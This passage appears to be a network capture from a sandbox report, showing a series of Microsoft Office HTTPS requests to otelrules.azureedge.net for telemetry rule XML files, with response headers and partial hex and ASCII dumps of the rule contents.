                                            2024-11-18 20:16:58 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            136192.168.2.44988713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:58 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:58 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1399
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                            ETag: "0x8DC582BE8C605FF"
                                            x-ms-request-id: 2374d1b0-301e-0020-6d09-376299000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-1866b5c5fbbfrdddhC1DFW7e90000000029000000000kkkr
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:58 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            137192.168.2.44988813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:58 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:58 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1362
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                            ETag: "0x8DC582BDF497570"
                                            x-ms-request-id: 70401fc9-201e-003c-2e89-3830f9000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-16547b76f7fd77jrhC1DFWfwq000000002zg00000000dbkz
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:58 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            138192.168.2.44988913.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:58 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:58 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1403
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                            ETag: "0x8DC582BDC2EEE03"
                                            x-ms-request-id: 787388c3-601e-0070-268f-37a0c9000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-164f84587bfdt5l2hC1DFW88gs00000004n000000000cnwv
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:58 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            139192.168.2.44989013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:58 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:59 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:58 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1366
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                            ETag: "0x8DC582BEA414B16"
                                            x-ms-request-id: 1573d8a3-d01e-002b-769d-3725fb000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201658Z-16547b76f7fjx5nrhC1DFW4dsc00000003b000000000zfpa
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:59 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            140192.168.2.44989113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:59 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:59 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1399
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                            ETag: "0x8DC582BE1CC18CD"
                                            x-ms-request-id: 9fe5a23c-201e-0051-74ab-367340000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201659Z-16547b76f7f5b5tthC1DFWuk8400000004xg00000000cmr9
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:59 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            141192.168.2.44989213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:59 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:59 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1362
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                            ETag: "0x8DC582BEB256F43"
                                            x-ms-request-id: 1b688191-f01e-0099-323e-389171000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201659Z-164f84587bf6n6jwhC1DFW90fn00000005c00000000109zc
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:59 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            142192.168.2.44989313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:59 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:59 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1403
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                            ETag: "0x8DC582BEB866CDB"
                                            x-ms-request-id: 32a1e0c1-401e-0048-618a-370409000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201659Z-164f84587bfdfkt7hC1DFW4fas000000046000000000vswt
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:59 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            143192.168.2.44989413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:59 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:59 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1366
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                            ETag: "0x8DC582BE5B7B174"
                                            x-ms-request-id: 68acba38-501e-000a-677f-380180000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201659Z-16547b76f7fjx5nrhC1DFW4dsc00000003b000000000zfra
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            X-Cache-Info: L1_T2
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:59 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            144192.168.2.44989513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:59 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:59 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:59 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1399
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                            ETag: "0x8DC582BE976026E"
                                            x-ms-request-id: cfc1385c-801e-0083-58d2-37f0ae000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201659Z-16547b76f7fgvq8chC1DFWhd2w00000006rg00000000zkxf
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:59 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            145192.168.2.44989613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:17:00 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:17:00 UTC494INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:17:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1362
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                            ETag: "0x8DC582BDC13EFEF"
                                            x-ms-request-id: d7b14c3d-501e-0047-0581-37ce6c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201700Z-1866b5c5fbbzzh8chC1DFWzc5c00000000n000000000cd3k
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:17:00 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            146192.168.2.44989713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:17:00 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:17:00 UTC515INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:17:00 GMT
                                            Content-Type: text/xml
                                            Content-Length: 1425
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                            ETag: "0x8DC582BE6BD89A1"
                                            x-ms-request-id: a62daa21-301e-0096-7fca-36e71d000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201700Z-164f84587bfs5tz9hC1DFW9a3w00000006cg00000000bs2m
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
